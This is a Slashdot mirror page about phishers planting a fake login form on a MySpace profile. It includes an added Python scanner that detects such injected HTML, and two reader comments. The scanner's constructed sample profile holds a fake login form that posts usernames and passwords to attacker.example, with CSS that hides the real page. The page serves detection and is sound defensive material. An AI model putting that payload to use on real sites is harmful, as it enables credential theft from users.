Slashdot Mirror


MySpace Accounts Compromised By Phishers

An anonymous reader writes, "Netcraft has discovered that the social networking site MySpace appears to have been compromised by phishers who have presented a spoof login form on the main site. This modified login form submits the victim's username and password to a remote server hosted in France." From the article: "The hackers have engineered a fake login form on MySpace's own web site. Netcraft has notified MySpace of the issue, although it currently remains live. Because the fraudulent login page is hosted on MySpace's own servers and does not exhibit any signs of external content, such as cross-site scripting or open redirects, it is convincing and even security-conscious users are at risk of becoming victims. The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form." This Washington Post story from a few months back explains what's in it for the phishers.
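The attack described above combines two pieces of user-controlled markup: CSS that blanks out the host page's own elements, and a form that posts the victim's credentials to a third-party server. As an added example (not code from Netcraft, MySpace or the story), here is a small Python scanner for user-supplied profile HTML that flags both ingredients. The trusted host list, the id/class names assumed for the host page's layout, and the two sample profiles are assumptions constructed for the example, not the real payload.

```python
"""
Added example, not from the article: flag user-supplied profile HTML that
(a) contains a form posting off-site or a password field, and
(b) contains CSS able to hide or cover the host page's own content.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption for the example: the site is served from these hosts, so any
# form action resolving elsewhere is an off-site credential sink.
TRUSTED_HOSTS = {"myspace.com", "www.myspace.com"}

# Declarations that let injected markup hide or overlay the real page.
_HIDING_CSS = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|"
    r"position\s*:\s*(?:absolute|fixed)|z-index\s*:\s*\d+",
    re.I,
)
# Assumption: the host page's own layout uses ids/classes like these;
# a profile stylesheet has no business targeting them.
_HOST_SELECTORS = re.compile(r"[#.](?:header|nav|login|content|footer)\b", re.I)


class ProfileScanner(HTMLParser):
    def __init__(self, trusted_hosts=TRUSTED_HOSTS):
        super().__init__()
        self.trusted_hosts = {h.lower() for h in trusted_hosts}
        self.findings = []
        self._in_style = False

    def _flag(self, msg):
        # Keep each finding once, even if several rules or chunks trigger it.
        if msg not in self.findings:
            self.findings.append(msg)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            host = urlsplit(a.get("action") or "").hostname
            # A relative action still posts to the host site; only a foreign
            # hostname (including scheme-relative //host/...) is flagged.
            if host and host.lower() not in self.trusted_hosts:
                self._flag(f"form posts off-site to {host}")
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self._flag("password field in user content")
        if tag == "style":
            self._in_style = True
        style = a.get("style") or ""
        if _HIDING_CSS.search(style):
            self._flag(f"inline style hides/overlays content on <{tag}>")

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:
            if _HIDING_CSS.search(data):
                self._flag("stylesheet hides/overlays content")
            if _HOST_SELECTORS.search(data):
                self._flag("stylesheet targets host page elements")


def scan_profile(html, trusted_hosts=TRUSTED_HOSTS):
    """Return a list of human-readable findings for one profile's HTML."""
    parser = ProfileScanner(trusted_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample modelled on the description above (not the real payload).
SAMPLE_PROFILE = """
<style>
  #header, #nav, #content, #footer { display: none; }
  .fakelogin { position: absolute; top: 0; left: 0; z-index: 1000; background: #fff; }
</style>
<div class="fakelogin">
  <form action="http://attacker.example/collect.php" method="post">
    <input type="text" name="email">
    <input type="password" name="password">
    <input type="submit" value="Login">
  </form>
</div>
"""

# Constructed benign profile: ordinary styling and an on-site link.
BENIGN_PROFILE = """
<div style="color: #c0c; font-weight: bold">Hi, welcome to my page!</div>
<a href="http://www.myspace.com/friends">my friends</a>
"""

if __name__ == "__main__":
    for name, html in (("benign", BENIGN_PROFILE), ("phish", SAMPLE_PROFILE)):
        print(name, scan_profile(html) or "clean")
```

A scanner like this is a detection aid for reviewing already-published profiles; the durable fix is an allow-list sanitizer that never lets `<form>`, `<input>`, `<style>` or positioning/visibility declarations into user content in the first place.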

2 of 86 comments

  1. Re:It's dead... by Anonymous Coward · Score: 1, Insightful
    Seems Myspace has fixed it.

    No, they've deleted this one specific account - the vulnerability that allowed the phishers to insert a form (and the styling to remove the regular page content, which is a feature) is almost certainly still there.

    Expect to see a large number of variations on this to show up in the next few days/weeks.

  2. Re:Phishing + SSL by baadger · Score: 2, Insightful
    How do sites like these get SSL from Verisign? How could that slip through? There was a recent /. headline about SSL Extended Validation and how it's needed: http://it.slashdot.org/article.pl?sid=06/10/25/2046225 In cases like these, I guess it makes sense

    When you can buy SSL certificates so damn cheap, $15 or less at some places, no serious company is going to certify you as being hardened against XSS or traditional hacks like this and compensate you or your users when you DO get hacked.

    Besides, Verisign only guarantee that their private signing keys are secure and therefore no one could have possibly forged the certificate and hence eavesdropped on the data as it passes across the wire. They really couldn't give a rat's arse about what data retention or security is like on the other end. In fact, refusing to issue MySpace an SSL certificate on the grounds their server-side security is shit would be wrong, as this kind of hack is not what SSL was intended to prevent.